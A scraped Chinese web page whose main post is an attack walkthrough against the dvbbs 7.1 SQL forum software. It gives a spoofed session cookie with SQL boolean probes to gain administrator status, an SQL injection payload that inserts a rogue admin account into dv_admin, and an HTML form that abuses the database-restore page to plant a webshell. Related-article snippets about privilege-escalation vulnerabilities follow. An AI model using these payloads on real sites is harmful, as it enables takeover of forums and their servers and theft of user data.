最新dvbbs 7.1sql提权得shell_漏洞研究

dvbbs 7.1跳过死循环,按linzi的方法只能是有一个管理权限,而只是新手上路的等级  

如果是sql版,就不好暴库,事实上好像只需要抓取SESSION即可,不要登陆任何用户。  

欺骗时不要关闭假死的那个ie  

这个是死循环的SESSION:  

ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ  

加入或替换到可以欺骗的浏览器的cookie栏。  

List=list5+and+1%3D2=1&list5+and+1%3D1=1&list1+and+1%3D2=1&list1+and+1%3D1=1&list3+and+1%3D2=1&list3+and+1%3D1=1; ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ  

然后点任何板块  

就能发现,你欺骗的用户和等级都是管理员了。  

后台管理员可以通过用户奖励那里加入  

test','127.0.0.1',5) ;insert into dv_admin (username,[password],flag,adduser) values ('jinsdb','4ac646c9e65a1769','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37','jinsdb');--  

dvbbs7.1 sql 后台得shell  

<form action="http://127.0.0.1/bbs/admin/data.asp?act...t=Restore" method="post">  

<p>已上传文件的位置:<input name="Dbpath" type="text" size="80"></p>  

<p>要复制到的位置:<input name="backpath" type="text" size="80"></p>  

<p><input type="submit" value="提交"></p>  

</form>  

好像7.1的usercookies只是个幌子  

根本没必要  

去掉了也一样可以使用  

搞笑  

时间: 2024-09-20 11:58:35

最新dvbbs 7.1sql提权得shell_漏洞研究的相关文章

瑞星杀毒软件长期存在两个“本地提权”0day安全漏洞

1月27日消息 波兰一家安全组织(www.ntinternals.org)近日公布:瑞星杀毒软件长期存在两个"本地提权"0day安全漏洞,使木马病毒能轻易获得瑞星用户的系统控制权.国内安全厂商金山和360的技术专家均已确认了这两个漏洞的存在,一旦受到黑客攻击,数千万瑞星用户将丧失对木马病毒的防御能力,并将导致国内大批政府与企业内网的信息安全面临严重威胁.曝光者说,瑞星杀毒的这两个漏洞涉及瑞星杀毒软件2008.2009.2010等主要版本,而且利用方式简单.稳定,能使黑客在攻击瑞星用户时

Debian Ubuntu Root权限受到威胁 Tomcat本地提权漏洞CVE-2016-1240 请安全运维尽快升级

2016年9月30日,legalhackers.com网站发布了一个关于Tomcat漏洞的公告,所涉及漏洞的编号为CVE-2016-1240.Debian系统的Linux上管理员通常利用apt-get进行包管理,debian包的一个初始化脚本中存在漏洞,会让deb包安装程序自动执行启动脚本,脚本位置/etc/init.d/tomcatN 攻击者可以在拥有Tomcat低权限的情况下,利用该漏洞获得系统的root权限.受影响的系统包括Debian和ubuntu,其他使用debian包的系统也可能会受

Skype爆严重缓冲区溢出漏洞,可提权于无形之中

本文讲的是Skype爆严重缓冲区溢出漏洞,可提权于无形之中,近日,微软旗下非常流行的免费网络短信和语音呼叫服务Skype被发现了一个严重的漏洞,该漏洞可以让黑客远程执行恶意代码或者导致系统崩溃.  Skype是一种免费的在线服务,允许用户之间通过互联网进行语音,视频和即时消息进行通信.由于其在全球具有很高的知名度,该服务于2011年5月被微软公司以85亿美元收购.  这枚未知的堆栈缓冲区溢出漏洞(CVE-2017-9948)位于Skype Web的消息和通话服务中,该漏洞是来自德国based s

Android adb setuid提权漏洞

去年的Android adb setuid提权漏洞被用于各类root刷机,漏洞发现人Sebastian Krahmer公布的利用工具RageAgainstTheCage(rageagainstthecage-arm5.bin)被用于z4root等提权工具.Trojan.Android.Rootcager等恶意代码之中.下面我们来分析这一漏洞的产生原因. The Android Exploid Crew小组在后来发布了一份PoC代码:rageagainstthecage.c.从这份代码开始着手.

Wordpress4.2.3提权与SQL注入漏洞分析

这是这几天一直关注的漏洞了,wordpress上个礼拜发布的4.2.4版本,其中提到修补了可能存在的SQL漏洞和多个XSS. Check point也很快发出了分析,我也来分析与复现一下最新的这个漏洞.   0x01 GP混用造成的越权漏洞 首先,说明一下背景.wordpress中用户权限分为订阅者.投稿者.作者.编辑和管理员. 权限最低的是订阅者,订阅者只有订阅文章的权限,wordpress开启注册后默认注册的用户就是订阅者.国内很多知名网站,如Freebuf,用户注册后身份即为“订阅者”.

漏洞预警:MySQL代码执行0-day漏洞 可本地提权

来自波兰的安全研究人员Dawid Golunski刚刚发现了两个MySQL的0-day漏洞,影响到所有版本分支.默认配置的MySQL服务器(5.7.5.6和5.5),包括最新版本.攻击者可以远程和本地利用漏洞.攻击者成功利用漏洞后,可以ROOT权限执行代码,完全控制MySQL数据库.攻击者仅需有FILE权限即可实现ROOT提权,进而控制服务器. 漏洞编号: CVE-2016-6662与CVE-2016-6663 漏洞影响: MySQL <= 5.7.15 远程代码执行/ 提权 (0day) 5.

Serv-U防溢出提权攻击解决设置方法_win服务器

前言: 大家应该都还没有忘记三年前在Serv-U5.004版的之前所有版本的"Serv-U FTPMDTM命令缓冲区溢出"与"Serv-U FTP服务器LIST命令超长-l参数远程缓冲区溢出漏洞"吧,这个漏洞让很多服务器管理员立坐不安,也让很多大型的站点.甚至电信级的服务器沦陷了...随着Serv-U新版本的推出,这个漏同已经不存在了:虽然溢出不存在了,但黑客永远也没有停止,所以伴随着来的又是Serv-U5.0到6.0之黑客常用的本地提升权限缺陷.(注:最常见的就如

Mysql数据库提权常用的安全问题介绍

一.UDF的安全问题利用 譬如, 执行一条sql语句查看/etc/passwd文件的内容:       这里主要是用到了load_file()函数,当然这个函数是可以被禁用的.以上可以轻松看到/etc/passwd文件的信息和ip地址,当然其他的文件内容都可以被看到. 由于load_file()函数只能实现类似系统命令cat的查看文件功能,但是想执行系统命令的功能,那么只能用UDF了,也就是User defined Function,用户定义函数. 查看mysql的plugin,plugin_d

快照不是表象 网站提权从更新快照做起

  虽然搜索引擎一再强调,网站快照只是搜索引擎收录网站的一个日期记录,没有必要过于深究,而且谷歌等一些搜索引擎刻意的隐去快照更新日期.但事情的另一方面却是,从已经发生的实例足可以证明,快照与网站权重存在某种联系.网站排名好,权重高的一些网站,快照更新相当频繁;而快照退档即意味着网站已经或将降权,退档日期内能肯定有一些做法不甚妥当;长时间不更新快照的一些网站,至少说明网站是没有太多新内容的.如果不断的发布新内容,网站却依旧持久不更新,那就是个很危险的信号,很可能网站被降权了.在交换链接的时候,也大